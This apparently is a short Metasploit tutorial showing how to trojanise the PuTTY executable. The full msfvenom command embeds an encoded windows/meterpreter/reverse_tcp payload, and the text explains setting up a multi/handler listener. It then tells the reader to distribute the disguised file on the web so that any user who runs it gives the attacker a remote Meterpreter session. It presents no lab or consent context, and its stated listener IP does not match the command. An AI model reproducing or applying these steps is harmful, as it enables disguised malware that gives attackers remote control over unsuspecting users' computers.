by It can take a really long time to create a custom “exe” file for a target computer and write codes into it. We created a new backdoor in our previous article. Now you can insert Metasploit Payload modules into an existing file with an “exe” extension. We will show how to encode and insert Metasploit Payload into an “exe” file. In this way, Meterpreter will be logged into our computer from the computer of the user running the coded special “exe” file.
Sample Exe File Download
In our example, we will use the file named putty.exe. First, download this file. Now that we will distribute our encoded .exe file from the web page, go to /var/www/ folder of our server in Kali Linux and start the download with the following command.
root@omer:/var/www# wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
Placing Metasploit Payload Module
We will insert a Metasploit Payload module into the putty.exe file we downloaded, using the msfvenom command. The module we will place is the windows / meterpreter / reverse_tcp module and as LHOST we will set our own IP address of 192.168.254.129.
When the process is successful, we have an executable file named “putty.exe” encoded and loaded with the payload.
root@omer:/var/www# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.254.132 LPORT=443 -f exe -a x86 -o puttyO.exe --platform windows -x putty.exe -e x86/shikata_ga_nai -i 20
Opening Listener Module
Since we have inserted the reverse payload into the “exe” file, this payload will want to connect to our local computer. For this, we will run a listener module in “msfconsole“.
We will use the “exploit/multi/handler” module as a listener module and you can make the necessary settings as follows.
The listening module also works. After this stage, what needs to be done is to distribute the .exe file we created over the web. When any user runs this file, it will automatically connect to our local computer and a Meterpreter login will be established.
Meterpreter Login
As shown in the screen below, when any user runs this file, it will automatically connect to our local computer and a Meterpreter login will be established.
